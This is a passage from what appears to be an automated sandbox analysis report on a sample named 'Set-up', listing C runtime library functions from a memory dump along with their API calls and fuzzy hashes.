                                                                                              • _malloc_crt.MSVCR100(00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB6AB8B
                                                                                              • _lock.MSVCR100(0000000A,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB6AB9D
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000FA0,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB6ABB4
                                                                                              • __FF_MSGBANNER.LIBCMT ref: 6BB8749F
                                                                                              • __NMSG_WRITE.LIBCMT ref: 6BB874A6
                                                                                              • _errno.MSVCR100(6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB874B9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCriticalInitializeSectionSpin_errno_lock_malloc_crt
                                                                                              • String ID:
                                                                                              • API String ID: 957642387-0
                                                                                              • Opcode ID: 4092fcfb45747a9814d88b932cf1b5c653b44ee96928fd3276bb02e5d62cc0d6
                                                                                              • Instruction ID: 66bb20ce10569debef11e3c87c746f56235dad9bc4312179b8431c0dc2bb6d78
                                                                                              • Opcode Fuzzy Hash: 4092fcfb45747a9814d88b932cf1b5c653b44ee96928fd3276bb02e5d62cc0d6
                                                                                              • Instruction Fuzzy Hash: 8F1191326483D2DEEB106FB69882A2D7BA09F81798F54406ED1156B1C0FBBC4E819F51
                                                                                              Function 6BB627B6 Relevance: 13.5, APIs: 9, Instructions: 44COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$__doserrno$AttributesErrorFileLast__dosmaperr_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 2636503730-0
                                                                                              • Opcode ID: 1322ea12e1ee49807201179eb13c233ca241e947b0f2c45707098406ae5412e4
                                                                                              • Instruction ID: 07fe8b88831e45e9b9a4ddc012fb7fd0a9af30bf73d57493995beb561c3475f9
                                                                                              • Opcode Fuzzy Hash: 1322ea12e1ee49807201179eb13c233ca241e947b0f2c45707098406ae5412e4
                                                                                              • Instruction Fuzzy Hash: F90181315486E49FDB166FBAD846BAD3765DF027E8F014155E8288B1A0FB7C8C42CFA1
                                                                                              Function 6BBA61D3 Relevance: 13.5, APIs: 9, Instructions: 43COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BBA61DA
                                                                                              • __ExceptionPtrCopy.LIBCMT(?,00000008,00000014,6BBA58ED,?,?,00000000), ref: 6BBA61F1
                                                                                                • Part of subcall function 6BBABBFB: __EH_prolog3.LIBCMT ref: 6BBABC02
                                                                                                • Part of subcall function 6BBABBFB: _Reset.LIBCMT ref: 6BBABC21
                                                                                              • ?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(00000008,?,00000008,00000014,6BBA58ED,?,?,00000000), ref: 6BBA61FB
                                                                                                • Part of subcall function 6BBABB8A: shared_ptr.LIBCMT ref: 6BBABB94
                                                                                              • ??3@YAXPAX@Z.MSVCR100(00000008,00000008,?,00000008,00000014,6BBA58ED,?,?,00000000), ref: 6BBA6201
                                                                                              • __uncaught_exception.MSVCR100 ref: 6BBA620D
                                                                                              • __ExceptionPtrCopy.LIBCMT(?,?), ref: 6BBA621E
                                                                                              • ?__ExceptionPtrRethrow@@YAXPBX@Z.MSVCR100(?,?,?), ref: 6BBA622B
                                                                                              • ?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(?,?,?,?), ref: 6BBA6238
                                                                                              • ?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(?), ref: 6BBA6248
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception$Destroy@@$CopyH_prolog3$??3@ResetRethrow@@__uncaught_exceptionshared_ptr
                                                                                              • String ID:
                                                                                              • API String ID: 1394407404-0
                                                                                              • Opcode ID: 7a09e8ab6d401e18d865a356ed6e7521ea579b4ca3383ce415a26d3a4bb6f17f
                                                                                              • Instruction ID: c962708f175db785c99e1d588ecd4313df60a7f4045124b04d49430b534fd32d
                                                                                              • Opcode Fuzzy Hash: 7a09e8ab6d401e18d865a356ed6e7521ea579b4ca3383ce415a26d3a4bb6f17f
                                                                                              • Instruction Fuzzy Hash: 98017172C056D8AADF20DBF48946BDDB778EF09219F840294D660A30C0E73D964587B1
                                                                                              Function 6BB65489 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116stringCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT(00000000,00000000,00000090,00000083,00000001,000000BC,?,6BB65B4D,?,00000001,00000000,00000000,00000005), ref: 6BB6549D
                                                                                              • strncpy_s.MSVCR100(00000080,00000010,00000001,0000000F,00000000,00000000,00000005), ref: 6BB72BFB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memsetstrncpy_s
                                                                                              • String ID: _.,
                                                                                              • API String ID: 1794348173-2709443920
                                                                                              • Opcode ID: 3a55aaa5b19bbfa1e48dce6514186c29bd11fce8499ee910965d39b849590bd3
                                                                                              • Instruction ID: bdca5b88c0c72a5faf8ac6b0d82146c53cbc270119ec9984f68859f5e4a55107
                                                                                              • Opcode Fuzzy Hash: 3a55aaa5b19bbfa1e48dce6514186c29bd11fce8499ee910965d39b849590bd3
                                                                                              • Instruction Fuzzy Hash: F031EB725492C5FDE710AA649C01BDE375EDF0736CF844471FE5896082E73CD5408761
                                                                                              Function 6BB62719 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _errno.MSVCR100 ref: 6BB89333
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB8933E
                                                                                              • _errno.MSVCR100(?), ref: 6BB8934B
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?), ref: 6BB89356
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              • String ID: B
                                                                                              • API String ID: 2959964966-1255198513
                                                                                              • Opcode ID: dfb0138fbacceb2ed61b1254190d5228ed7b83fcb00fb3b19c5fa06f21955bf8
                                                                                              • Instruction ID: 159f5effcb052acf6ce6e15a76850d906666111b74f7c887b73ef4703f7b8391
                                                                                              • Opcode Fuzzy Hash: dfb0138fbacceb2ed61b1254190d5228ed7b83fcb00fb3b19c5fa06f21955bf8
                                                                                              • Instruction Fuzzy Hash: 8F316F318042999FEF009FB8C8818EE77B4FF49364F50062AE920A71D1E73D99018FA5
                                                                                              Function 6BB69518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              • String ID: B
                                                                                              • API String ID: 2959964966-1255198513
                                                                                              • Opcode ID: 5dfe4bd0d776542f396be993e9a7b325b44c8f4325efb2e67d50cfe0f4532dd6
                                                                                              • Instruction ID: ec84b8d355cc9edcb7d47220101937e539d591fb19427846a98404c8a5a0cf2a
                                                                                              • Opcode Fuzzy Hash: 5dfe4bd0d776542f396be993e9a7b325b44c8f4325efb2e67d50cfe0f4532dd6
                                                                                              • Instruction Fuzzy Hash: 4A2174729042999FEF019FA8CC819EE77B8FB09364F500667E520A7181E77D9C058BA5
                                                                                              Function 6BB61860 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              • String ID: B
                                                                                              • API String ID: 2959964966-1255198513
                                                                                              • Opcode ID: 5765919894b30d5b86ac3d29871ac6afc4c7dab84d3569b456cd77ba54153e89
                                                                                              • Instruction ID: 4d0de1f1c3d7f064c5112d4fee1272c24ce078088a8618c850b404a5585b8619
                                                                                              • Opcode Fuzzy Hash: 5765919894b30d5b86ac3d29871ac6afc4c7dab84d3569b456cd77ba54153e89
                                                                                              • Instruction Fuzzy Hash: BC2160729002A99FEF009FE9CC818EE77B4FB09364B14162AE530A7181E77D98058BA5
                                                                                              Function 6BB74D6D Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 77COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameName::
                                                                                              • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                              • API String ID: 1333004437-2211150622
                                                                                              • Opcode ID: 78dc64a9adda0370146d36de633c5f0eb7fb4861bf77d2eba977c17132302d88
                                                                                              • Instruction ID: b87cd28661febeee0f8b13b25a3687a68202818e47daa532324372fd35f09a48
                                                                                              • Opcode Fuzzy Hash: 78dc64a9adda0370146d36de633c5f0eb7fb4861bf77d2eba977c17132302d88
                                                                                              • Instruction Fuzzy Hash: 98214F31740685AFCB01DF1CE4449AA7BF5FF5638AB4180AAE855DF211CB39EA02CB40
                                                                                              Function 6BB73BB0 Relevance: 12.2, APIs: 8, Instructions: 214stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • strncpy_s.MSVCR100(?,00000003,?,00000002), ref: 6BB73C42
                                                                                              • _ismbblead.MSVCR100(00000001), ref: 6BB73C61
                                                                                              • strncpy_s.MSVCR100(?,?,?,?), ref: 6BB73CB5
                                                                                              • strncpy_s.MSVCR100(?,?,?,?), ref: 6BB73CEA
                                                                                              • _errno.MSVCR100 ref: 6BB90F5B
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB90F6A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: strncpy_s$_errno_invalid_parameter_noinfo_ismbblead
                                                                                              • String ID:
                                                                                              • API String ID: 519590025-0
                                                                                              • Opcode ID: 4e00a091103d941e1c40a338997678d01b7d0434557b1924abd6fe849d78b28f
                                                                                              • Instruction ID: 86443f47d4b2466331e4804f5c07a4420ff7ea75b0776e6605cec9aa9687a6b9
                                                                                              • Opcode Fuzzy Hash: 4e00a091103d941e1c40a338997678d01b7d0434557b1924abd6fe849d78b28f
                                                                                              • Instruction Fuzzy Hash: D3718631944AC8DFCF32AF28D8547DE3BA1EB86744F6501B6F87856144E379C982CB91
                                                                                              Function 6BB68E3C Relevance: 12.2, APIs: 8, Instructions: 211COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3bdde8d1928b69ec94474110a01d60dbf1ed264d7b3ef511e4efdda36b45b28f
                                                                                              • Instruction ID: 9417463cdb4ccd617f6dfcbdb655bfe882ce01034942ad06caa759bed162a4df
                                                                                              • Opcode Fuzzy Hash: 3bdde8d1928b69ec94474110a01d60dbf1ed264d7b3ef511e4efdda36b45b28f
                                                                                              • Instruction Fuzzy Hash: 21716871D0029ADFDF10DFA4C8909FEBBB5FB06314B1405AAE525A7284E739D980CFA1
                                                                                              Function 6BB64DDA Relevance: 12.2, APIs: 8, Instructions: 175stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __expandlocale.LIBCMT ref: 6BB64E34
                                                                                                • Part of subcall function 6BB64CF9: _getptd.MSVCR100(00000000,00000000,00000005), ref: 6BB64D2F
                                                                                                • Part of subcall function 6BB64CF9: strcpy_s.MSVCR100(00000000,00000000,6BB64DD8,00000000,00000000,00000005), ref: 6BB64D9D
                                                                                              • strcmp.MSVCR100(?,00000048,?,?,?,00000001,00000000,00000000), ref: 6BB64E50
                                                                                              • _strpbrk.LIBCMT(00000005,6BB73008,00000001,00000000,00000000), ref: 6BB72FCD
                                                                                              • strncmp.MSVCR100(6BB64AD4,00000005,00000000,00000001,00000000,00000000), ref: 6BB7300F
                                                                                              • _strlen.LIBCMT(6BB64AD4,00000001,00000000,00000000), ref: 6BB73036
                                                                                              • _strcspn.LIBCMT(00000001,6BB6498C,00000001,00000000,00000000), ref: 6BB7304B
                                                                                              • strncpy_s.MSVCR100(?,00000083,00000001,00000000,00000001,00000000,00000000), ref: 6BB73075
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: __expandlocale_getptd_strcspn_strlen_strpbrkstrcmpstrcpy_sstrncmpstrncpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 1101789701-0
                                                                                              • Opcode ID: 5cb25875ac85b09ac689ab3dc967168328b8b570b06de5173fc2d882b1b5d9e8
                                                                                              • Instruction ID: 91b615a637057d108304171e8b3ffd93d9543e2e251cdd4a98f6d44d5552dc04
                                                                                              • Opcode Fuzzy Hash: 5cb25875ac85b09ac689ab3dc967168328b8b570b06de5173fc2d882b1b5d9e8
                                                                                              • Instruction Fuzzy Hash: E1512771D046D59EEF349A748CA1B9EB7B8EB01384F1044FAD528E3142FB3D8E858B20
                                                                                              Function 6BBBFDBB Relevance: 12.2, APIs: 8, Instructions: 173COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _errno.MSVCR100(?,?,?,00000000,00000001,6BC06CD0), ref: 6BBBFDD5
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,?,00000000,00000001,6BC06CD0), ref: 6BBBFDE0
                                                                                                • Part of subcall function 6BBDAEAE: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6BBAB84F,?,6BBAC3D3,00000003,6BB874A4,6BB6AA18,0000000C,6BB874F7,00000001,00000001), ref: 6BBDAEB5
                                                                                              • _errno.MSVCR100(00000000,?,?,?,00000000,00000001,6BC06CD0), ref: 6BBBFE01
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000000,?,?,?,00000000,00000001,6BC06CD0), ref: 6BBBFE0C
                                                                                              • __stricmp_l.LIBCMT(00000001,00000000,?,00000000,?,?,?,00000000,00000001,6BC06CD0), ref: 6BBBFE36
                                                                                                • Part of subcall function 6BBD0E0D: _errno.MSVCR100(?,00000000,?,00000000,00000000,00000005), ref: 6BBD0E28
                                                                                                • Part of subcall function 6BBD0E0D: _invalid_parameter_noinfo.MSVCR100(?,00000000,?,00000000,00000000,00000005), ref: 6BBD0E33
                                                                                              • __crtLCMapStringA.MSVCR100(?,00000000,00000200,00000001,00000002,6BC06CD0,00000002,?,00000001,?,?,00000000,?,?,?,00000000), ref: 6BBBFE8C
                                                                                              • __crtLCMapStringA.MSVCR100(?,00000000,00000200,00000001,00000002,6BC06CD0,00000002,?,00000001,?,?,?,?,?,?,?), ref: 6BBBFF0D
                                                                                              • _errno.MSVCR100(?,?,?,?,?,?,?,00000000,?,?,?,00000000,00000001,6BC06CD0), ref: 6BBBFF6A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo$String__crt$__stricmp_l_invalid_parameter
                                                                                              • String ID:
                                                                                              • API String ID: 2295373847-0
                                                                                              • Opcode ID: 603d863ab6191c6e4dbf1b298263febe787c94863279d14a6e9d934dd312b481
                                                                                              • Instruction ID: 7a62e79886e36582c6bc174c105d2237007962694bc9f76a92ea8bbceeb8582f
                                                                                              • Opcode Fuzzy Hash: 603d863ab6191c6e4dbf1b298263febe787c94863279d14a6e9d934dd312b481
                                                                                              • Instruction Fuzzy Hash: EA510779D042D9ABDB158B68C495BBD7BB0EF42728F2481D9E0B15F1D2DB3C8A41CB50
                                                                                              Function 6BB64286 Relevance: 12.1, APIs: 8, Instructions: 103COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _errno.MSVCR100(?,?,6BB642B4,?), ref: 6BB8875A
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,6BB642B4,?), ref: 6BB88765
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 2959964966-0
                                                                                              • Opcode ID: 9c47925c3d70f2bc29667c23525f367317937b640bcb55925b4d3f851b8926e7
                                                                                              • Instruction ID: 9a71b7eea12a85b142414b4996d40a351f6288c94d869789cdcdbd7f303d38f3
                                                                                              • Opcode Fuzzy Hash: 9c47925c3d70f2bc29667c23525f367317937b640bcb55925b4d3f851b8926e7
                                                                                              • Instruction Fuzzy Hash: A031B572460B918FD7218F39DC41B5A77A0EF06774B208A5DD4B58A190E73CE985CF80
                                                                                              Function 6BB6CE44 Relevance: 12.1, APIs: 8, Instructions: 103COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _fileno.MSVCR100(?,?,?,?,?,6BB73379,?), ref: 6BB6CE8D
                                                                                              • _read.MSVCR100(00000000,?,?,?,?,6BB73379,?), ref: 6BB6CE94
                                                                                              • _fileno.MSVCR100(?), ref: 6BB6CEB7
                                                                                              • _fileno.MSVCR100(?), ref: 6BB6CEC7
                                                                                              • _fileno.MSVCR100(?), ref: 6BB6CED8
                                                                                              • _fileno.MSVCR100(?,?), ref: 6BB6CEE8
                                                                                              • _errno.MSVCR100(?,?,6BB73379,?), ref: 6BB8870C
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,6BB73379,?), ref: 6BB88717
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _fileno$_errno_invalid_parameter_noinfo_read
                                                                                              • String ID:
                                                                                              • API String ID: 2022966298-0
                                                                                              • Opcode ID: 29b36f79c09d31aab98bc0a3cd6cf14587c0fa3d2006f53cac26df71cc54977d
                                                                                              • Instruction ID: acb6b36169d82fe8454eedf0f93953aa0289102be20ca85b907466b6e806802c
                                                                                              • Opcode Fuzzy Hash: 29b36f79c09d31aab98bc0a3cd6cf14587c0fa3d2006f53cac26df71cc54977d
                                                                                              • Instruction Fuzzy Hash: 3331F332404BD08ADB315F39C841B5AB7F4EF077A8B108A5DD4B58A5A0E73CE9468F84
                                                                                              Function 6BB76D24 Relevance: 12.1, APIs: 8, Instructions: 100COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000001,00000000,00000001,00000002), ref: 6BB76D8E
                                                                                              • _get_osfhandle.MSVCR100(?,00000000), ref: 6BB76D98
                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 6BB76D9F
                                                                                              • DuplicateHandle.KERNEL32(00000000), ref: 6BB76DA6
                                                                                                • Part of subcall function 6BB6A78A: _get_osfhandle.MSVCR100(?,?,?,?,6BB6A865,?,6BB6A880,00000010), ref: 6BB6A795
                                                                                                • Part of subcall function 6BB6A78A: _get_osfhandle.MSVCR100(?), ref: 6BB6A7B8
                                                                                                • Part of subcall function 6BB6A78A: CloseHandle.KERNEL32(00000000), ref: 6BB6A7BF
                                                                                              • _errno.MSVCR100 ref: 6BB90539
                                                                                              • __doserrno.MSVCR100 ref: 6BB90544
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
